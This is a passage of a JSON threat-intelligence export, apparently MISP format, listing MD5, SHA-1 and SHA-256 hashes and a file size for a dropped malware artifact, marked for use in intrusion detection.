"to_ids": true,
"type": "md5",
"uuid": "5e70a3c0-0248-48a6-8a74-41190a0a020f",
"value": "2f1ac455d1c6e2a3f3e0d1137b047696"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1584440256",
"to_ids": true,
"type": "sha1",
"uuid": "5e70a3c0-6124-4058-a54d-4f650a0a020f",
"value": "ba32c066d5927fa20b38d69357ce2ccee321b09a"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1584440256",
"to_ids": true,
"type": "sha256",
"uuid": "5e70a3c0-bdec-45f6-af1a-430d0a0a020f",
"value": "cf99990bee6c378cbf56239b3cc88276eec348d82740f84e9d5c343751f82560"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1584440256",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "5e70a3c0-03a4-4d2f-884b-459b0a0a020f",
"value": "115712"
}
]
}
]
}
}